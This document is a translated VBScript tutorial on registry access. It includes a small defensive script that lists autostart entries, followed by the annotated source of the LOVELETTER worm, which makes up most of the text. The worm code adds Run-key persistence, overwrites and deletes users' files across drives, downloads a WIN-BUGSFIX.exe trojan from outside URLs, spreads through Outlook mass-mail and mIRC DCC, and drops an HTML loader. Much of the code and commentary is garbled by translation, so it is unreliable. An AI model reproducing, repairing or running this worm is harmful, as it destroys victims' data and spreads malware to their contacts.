VBScript programming 5 --- Registry

zhaozj2021-02-16  62


Modifying the registry is a basic programming skill, and scripting is of course no exception.

Here, I will no longer explain the basic structure of the registry.

1. Reading registry keys and values

Pass the full path of the key or value to the RegRead method of the WshShell object.

For example:

Set ws = WScript.CreateObject("WScript.Shell")

v = ws.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NWIZ")

WScript.Echo v

2. Writing to the registry

To write, use the RegWrite method of the WshShell object.

For example:

path = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"

Set ws = WScript.CreateObject("WScript.Shell")

' RegWrite returns nothing, so it is called as a statement
ws.RegWrite path & "JJ", "Hello"

This changes the value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JJ to Hello. But note: this value must already exist.

To create a new key, use the same method.

' A path that ends in a backslash refers to the key's default value
path = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSSA2000\Love\"

Set ws = WScript.CreateObject("WScript.Shell")

ws.RegWrite path, "nenboy"

val = ws.RegRead(path)

WScript.Echo val

3. Deleting keys and values

Use the RegDelete method, passing it the complete path.

For example:

ws.RegDelete path

Note: to delete only a key's value, be sure to end the path with "\"; without the trailing backslash, the entire key is deleted.
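The examples above all touch the Run key, and the annotated worm source that follows recommends checking that branch regularly. As an added example (not part of the original article), this script lists the Run and RunServices entries in HKLM and HKCU and marks those that launch a script. It uses the WMI StdRegProv provider because WScript.Shell cannot enumerate values; the [CHECK] marker and the extension list are choices made for this example.

```vbscript
' Added example: audit autostart entries and flag those that launch a script.
Option Explicit

Const HKCU = &H80000001
Const HKLM = &H80000002
Const REG_SZ = 1
Const REG_EXPAND_SZ = 2

Dim reg, hives, hiveNames, subKeys, h, k
' StdRegProv (WMI) can enumerate value names; WScript.Shell can only read known paths.
Set reg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")

hives = Array(HKLM, HKCU)
hiveNames = Array("HKLM", "HKCU")
subKeys = Array("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", _
                "SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices")

For h = 0 To UBound(hives)
    For Each k In subKeys
        AuditKey hives(h), hiveNames(h), k
    Next
Next

Sub AuditKey(hive, hiveName, subKey)
    Dim names, types, i, data, flag
    ' A non-zero return means the key is missing or unreadable.
    If reg.EnumValues(hive, subKey, names, types) <> 0 Then Exit Sub
    ' names is Null when the key exists but holds no values.
    If IsNull(names) Then Exit Sub
    For i = 0 To UBound(names)
        data = ""
        Select Case types(i)
            Case REG_SZ
                reg.GetStringValue hive, subKey, names(i), data
            Case REG_EXPAND_SZ
                reg.GetExpandedStringValue hive, subKey, names(i), data
        End Select
        If IsNull(data) Then data = ""
        flag = "       "
        If LaunchesScript(data) Then flag = "[CHECK]"
        WScript.Echo flag & " " & hiveName & "\" & subKey & "\" & names(i) & " = " & data
    Next
End Sub

' True when the command line names a script file type or a script host.
Function LaunchesScript(cmd)
    Dim re
    Set re = New RegExp
    re.IgnoreCase = True
    re.Pattern = "\.(vbs|vbe|js|jse|wsf|wsh|hta)\b|\b(wscript|cscript|mshta)(\.exe)?\b"
    LaunchesScript = re.Test(cmd)
End Function
```

Run it with cscript //nologo so that each entry is printed to the console instead of appearing in a message box.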

OK, that covers the most basic script programming. Scripts really are quite simple. Take a look at the source code of the famous LOVELETTER virus below: apart from the e-mail part, which I have not covered, the rest should be clear.

REM BAROK -LOVELETTER (VBE) Rem by: spyder / ispyder@mail.com / @grammersoft group / manila, philip pines' Note: Program author's signature (possib) on Error ResMe Next Dim Fso, Dirsystem, Dirwin, Dirtemp, EQ, CTR, File, VBScopy, Dow EQ = "" CTR = 0 set fso = createObject ("scripting.filesystemObject") 'Note: FileSystemObject is the most dangerous part of the M $ VBVM system, its The function is very powerful 'Use FSO from the virus to know that by modifying the registry, it can easily prevent the LETTER episode. Set file = fso.opentextfile (wscript.scriptfullname, 1) 'Returns the full path of the current script vbscopy = file.readAll Main ()' Note - Program initialization is completed. sub main () On Error Resume Next dim wscr, rr set wscr = CreateObject ( "WScript.Shell") rr = wscr.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / Windows Scriptin g Host / Settings / Timeout") if (rr> = 1) THEN WSCR.REGWRITE "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Scripting Host / Settings / Timeout", 0, "REG_DWORD" 'Note - Prevents the termination caused by the operation timeout. 'It should be said that programmers who write viruses take into account possible problems, this is worth all of the programming. Endiffialfolder (0) Set Dirsystem = fso.getspecialfolder (1) Set dirtemp = fso.getspecialFolder (2) 'Get the name of the system key folder "VB can be used when programming. Set c = fso.getfile (wscript.scriptfullname) 'Returns the full path of the current script C.copy (Dirsystem & "/ mskernel32.vbs")' Copies a specified file or folder from one location to another. C.copy (Dirwin & "/ Win32DLL.VBS ") C.copy (Dirsystem &" / Love-letter-for-you.txt.vbs ") 'Copy itself to the key directory. 'The file name is not very good. It's easy to find it. Regruns () html () spreadtoemail () ListAdriv () End Sub

Sub regruns () 'Modify the registry to automatically load the virus program' prevention: often check this branch in the registry. 'Known methods also put HTA in a Startup folder. The method used by the virus program is more advanced, 'Because it does not fail because of language problems.

On Error Resume Next Dim num, downread regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / Run / MSKernel32", dirsystem & "/ MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / RunServices / Win32DLL" , dirwin & "/ Win32DLL.vbs" downread = "" downread = regget ( "HKEY_CURRENT_USER / Software / Microsoft / Internet Explore r / Download Directory") if (downread = "") then downread = "c: /" end if if ( FileExist (Dirsystem & "/ Winfat32.exe") = 1) Ten Randomize Num = INT ((4 * RND) 1) if Num = 1 Then Regreate "HKCU / Software / Microsoft / Internet Explorer / Main / Start Page", " http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT / WIN-BUGSFIX.exe "elseif num = 2 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http: // www .skyinet.net / ~ angelcat / skladjflfdjghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w / WIN-BUGSFIX.exe "elseif num = 3 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Sta rt Page "," http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg / WIN-BUGSFIX.exe "elseif num = 4 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg / WIN-B UGSFIX.exe "end if end if if (fileexist (downread &" / WIN-BUGSFIX.exe ") = 0) then regcreate" HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio N / Run / Win-Bugsfix ", DownRead &"

/WIN-BUGSFIX.exe "regcreate" HKEY_CURRENT_USER / Software / Microsoft / Internet Explorer / Main / Start Page "," about: blank "end if end subsub folderlist (folderspec) 'Traverse Folder On Error Resume Next dim f, f1, sf set f = fso.getfolder (folderspec) set sf = f.subfolders 'Get all subfolders of a particular folder, including system hidden folder for Each F1 in sf' F1 object infectfiles for each subfolder (f1.path) 'Operation Folderlist (f1.path) in Infectious files Folder Download NEXT END SUB

Sub ListAdriv 'traverses all drives. On Error Resume Next DIM D, DC, S set DC = fso.drives for Each D in DC if D.driveType = 2 or D.DriveType = 3 THEN '2.3 is hard disk and network sharing disk FolderList (D.Path & "/ ") End if next listadriv = s end sub

Function FileExist (filespec) 'Judging whether the file has' purely from the technical perspective, this program is not working. 'Don't write so long, you can implement the same function on Error Resume next Dim Msg if (fso.fileexists (filespec)) THEN MSG = 0 else msg = 1 end if fileexist = msg End Function

Function FolderExist (folderspec) 'Decision is as stinking with the folder' and the previous program. On Error ResMe Next Dim Msg IF (Fso.GetFoldRexists (FSO.GETFOLDEREXISTS (Folderspec)) THEN MSG = 0 else msg = 1 end if fileexist = msg end function

Sub infectfiles (folderspec) 'Performs the operation of the infectious file.

On Error ResMe Next Dimf, F1, FC, EXT, AP, MIRCFNAME, S, BNAME, MP3 set f = fso.getfolder (folderspec) set fc = f.files' Get all files of a particular folder, including the system Hidden File for Each F1 in FC EXT = fso.GETEXTENSITIONNAME (F1.Path) 'Get Extensions EXT = LCase (EXT)' Transition to lowercase S = LCase (f1.name) IF (ext = "vbs") or (ext = "VBE") THEN SET AP = fso.opentextFile (f1.path, 2, true) ap.write vbscopy 'vbscopy = file.readall ap.close elseif (ext = "js") or (ext = "jse") OR (ext = "css") or (ext = "wsh") or (ext = "hta") The set ap = fso.opentextfile (f1.path, 2, true) AP. Write vbscopy ap.close bName = fso.getBaseName (f1.path) set copick = fso.getfile (f1.path) Cop.copy (folderspec & "/" & bname & ". vbs") fso.deletefile (f1.path) Elseif Ext = "jpg") or (ext = "jpeg") THEN SET AP = fso.opentextFile (f1.path, 2, true) ap.write vbscopy ap.close set cop = fso.getfile (f1.path) COP. COPY (F1.Path & "VBS") fso.deletefile (f1.path) Elseif (ext = "mp3") or (ext = "mp2") THEN SET MP3 = fso.createtextFile (f1.path & ". vbs") Mp3.write vbscopy mp3.close set at T = fso.getfile (f1.path) att.attributes = att.attributes 2 end if if (eq <> folderspec) THEN IF (S = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or (s = "scri pt.ini") or (s = "mirc.hlp") THEN SET scriptini = fso.createtetextfile (Folderspec & "/ script.ini") scriptini.writeline [script] "scriptini.writeline"; mirc script "scriptini.writeline";

Please dont edit this script ... mirc will Corru PT, IF mirc will "scriptini.writeline" Corrupt ... Windows Will Affect and Will Not Run Correctly. Thanks "'The English in the virus Author did not learn well ... but so frightened People are also suffering. 'Here, you will remind you to pay attention, don't care about the scary text, you will find a lot of vulnerabilities. Scriptini.writeline ";" scriptini.writeline "; khaled mardam-bey" scriptini.writeline " http://www.mirl.com "scriptini.writeline"; "scriptini.writeline" n0 = on 1: join: #: {"scriptini.writeLine" n1 = / if ($ nick == $ me) {halt } "scriptini.writeline" n2 = /.dcc send $ nick "& Dirsystem &" / Love-letter-fo r-you.htm "scriptini.writeLine" N3 =} "pay attention, the result of this is that MIRC can also be infected Virus. Scriptini.close EQ = folderspec end if end if next end subsub regreate (regable, regvalue) 'Modifying the registry (creating key)' This program seems to be a Microsoft's demonstration program. SET regedit = CreateObject ("wscript.shell" ) regedit.regwrite regkey, Regvalue End Sub

Function Regget (Value) 'This program seems to be a Microsoft's demonstration program. (WSH Demonstration, in Windows Folder) SET regedit = CreateObject ("wscript.shell") regget = regedit.regread (value) end function

sub spreadtoemail () 'diffusion Email On Error Resume Next dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad set regedit = CreateObject ( "WScript.Shell") set out = WScript.CreateObject ( " Outlook.Application ") 'Virus Limitations: Only Outlook, and Outlook Express does not support. set mapi = out.GetNameSpace ( "MAPI") for ctrlists = 1 to mapi.AddressLists.Count set a = mapi.AddressLists (ctrlists) x = 1 regv = regedit.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / WAB /" & a ) IF (regv = ") THEN REGV = 1 end if if (int (a.addressentries.count)> int (regv)) THEN for ctrentries = 1 to a.addressentries.count MaleAd = a.addressentries (x) Regad = "" Regad = regedit.regread ("HKEY_CURRENT_USER / SOFTWARE / Microsoft / WAB /" & MALE AD) IF (regad = ") THEN SET MALE = out.createItem (0) Male.Recipients.Add (MaleAd) Male.Subject = "IloveYou" The reason for the name of the virus' "see such a message is definitely a virus. The normal person of the mind is probably not straightforward. male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from m e." male.Attachments.Add (dirsystem & "/ LOVELETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER / Software / Microsoft / WAB / "& malead, 1," REG_DWORD "end if x = x 1 next regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& a, a.Addre ssEntries.Count else regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& A, A.Addre Ssentries.count End End Set Out = Nothing SET MAPI = Nothing End Sub Sub HTML 'From the technical point of view, this program is very beautiful, the reason is to fully utilize Outlook Resource 'deserves the reference of the program. 'The _ symbol in the middle of the program is the cable, so the comment is written here. 'There are many invalid statements in the program, and there are a lot of space.

On Error ResMe next Dim line, N, DTA1, DTA2, DT1, DT2, DT3, DT4, L1, DT5, DT6 DTA1 = " loveletter - HTML <? -? Title> <meta name = @ - @gene @ - @ content = @ - @ Barok VBS - Loveletter @ - @> "& vbcrf & _" <meta name = @ - @ Author @ - @ Content = @ - @ Spyder? -? Ispyder @ Mail. COM? -? @G Rammersoft Group? -? manila</p> <p>,</p> <p>Philippines</p> <p>? -? March 2000 @ - @> "& vbcrlf & _" <meta name = @ - @ description @ - @ Content = @ - @ Simple But I think this is Go @ @> "& vbcrlf & _" <? -? Head> <body onmouseout = @ - @ WINDOW.NAME = # - # main # - #; window.open (# lo ve-letter-for-you.htm # - #, # - # main # - #) @ - @ "& vbcrlf & _" onkeyDown = @ - @ WINDOW.NAME = # - # main # - #; window.open (# love-letter-for-yo u.htm # - #, # - # Main # - #) @ - @ bgproperties = @ - @ Fixed @ - @ bgcolor = @ - @ # ff9933 @ - @> "& vbcrf & _" <center> <p> this html file needed ActiveX Control <? -? p> <p> to enable to r Ead this html file <br> - please press # - # Yes # - # Button to enable Active x <? -? p> "& vbcrlf & _" <? center> <marquee loop = @ - @ infinite @ - @ bgcolor = @ - @ Yellow @ - @> -------- --z -------------------- Z - -------- <? -? Marquee> "& vbcrlf & _" <? -? Body> <? -? HTML> "& vbcrf & _" <script language = @ - @ Jscript @ - @> "& vbcrlf & _" <! -? - ?? -? "& vbcrlf & _" {var wi = screen.availwidth; var hi = screen.availheight; window.moveto (0); Window.resizeto (Wi, Hi);} "& vbrlf & _"? - ?? -? -> "& vbcrlf & _" <? -? script> "& vbcrlf & _ <script language = @ - @ Vbscript @ - @>" & vbc RLF & _ <! 
- "& VBCRLF & _" On Error ResMe Next "& Vbcrf & _" DIM FSO, DIRSYSTEM, WRI, CODE, CODE2, CODE3, CODE4, AW, Regdit "& VBCRLF & _" AW = 1 "& VBCRLF &</p> <p>_ "Code =" dta2 = "set fso = CreateObject (@ - @ Scripting.FileSystemObject @ - @)" & vbcrlf & _ "set dirsystem = fso.GetSpecialFolder (1)" & vbcrlf & _ "code2 = replace (code, chr (91) & chr (45) & chr (91), CHR (39)) "& VBCRLF & _" CODE3 = Replace (CODE2, CHR (93) & CHR (45) & Chr (93), CHR (34)) "& VBCRLF & _" Code4 = Replace CODE3, CHR (37) & CHR (45) & chr (37), CHR (92)) "& VBCRLF & _" set WRI = fso.createtextfile (Dirsystem & @ - @ ^ - ^ MSkernel32.vbs @ - @) "& vbcrf & _" Wri.write code4 "& vbcrf & _" Wri.close "& vbcrlf & _" ing (fso.fileexists (Dirsystem & @ - @ ^ - ^ MSkernel32.vbs @ - @)) THEN "& VBCRLF & _" IF (Err.Number = 424) THEN "& VBCRLF & _" AW = 0 "& VBCRLF & _" End IF "& VBCRLF & _" IF (AW = 1) TEN "& VBCRLF & _" Document.write @ - @ Error: Can # - # Tinitialize ActiveX @ - @ "& vbcrlf & _" window.close "& vbcrlf & _" end if "& vbcrlf & _" end if "& vbcrlf & _" Set regedit = CreateObject (@ - @ WScript.Shell @ - @) "& vbcrlf & _" regedit.RegWrite @ - @ HKEY_LOCAL_MACHINE ^ - ^ Software ^ - ^ Microsoft ^ - ^ Windo WS ^ - ^ currentversion ^ - ^ Run ^ - ^ MSkernel32 @ - @, dirsystem & @ - @ ^ - @ "& vbcrlf & _"? - ?? -? - > "& vbcrlf & _" <? -? 
Cript> "DT1 = Replace (DTA1, CHR (35) & chr (45) & chr (35)," ') DT1 = Replace (DT1, CHR (64) & chr (45) & chr (64), "" "" DT4 = Replace (DT1, CHR (63) & chr (45) & chr (63), "